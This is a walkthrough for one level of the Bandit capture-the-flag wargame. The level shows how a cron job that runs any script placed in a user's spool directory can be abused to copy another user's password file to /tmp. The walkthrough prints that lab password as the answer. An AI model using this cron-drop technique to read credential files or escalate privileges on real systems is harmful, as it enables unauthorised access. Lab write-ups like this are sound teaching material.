Bandit Level 23 → Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Level Answer

1. ls [FILE]

$ ls /etc/cron.d/
cronjob_bandit22  cronjob_bandit23  cronjob_bandit24  popularity-contest

2. cat [FILE]

$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh  &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh  &> /dev/null

3. cat [FILE]

$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
    echo "Handling $i"
    timeout -s 9 60 ./$i
    rm -f ./$i
    fi
done

4. vi [FILE]

Create shell-script

$ vi /tmp/cronjob.sh
#!/bin/bash

echo "Copying passwordfile /etc/bandit_pass/bandit24 to /tmp/password"
cat /etc/bandit_pass/bandit24 > /tmp/password

5. cp [SOURCE] [DIRECTORY]

$ cp /tmp/cronjob.sh /var/spool/bandit24

6. cat [FILE]

$ cat /tmp/password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

7. ssh [-p port] [user@]hostname

[-p port] Port to connect to on the remote host.

$ ssh -p 2220 [email protected]

Level Password

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Level 23 → Level 24

Bandit Level 23 → Level 24

Level Goal

Level Answer

Level Password

results matching ""

No results matching ""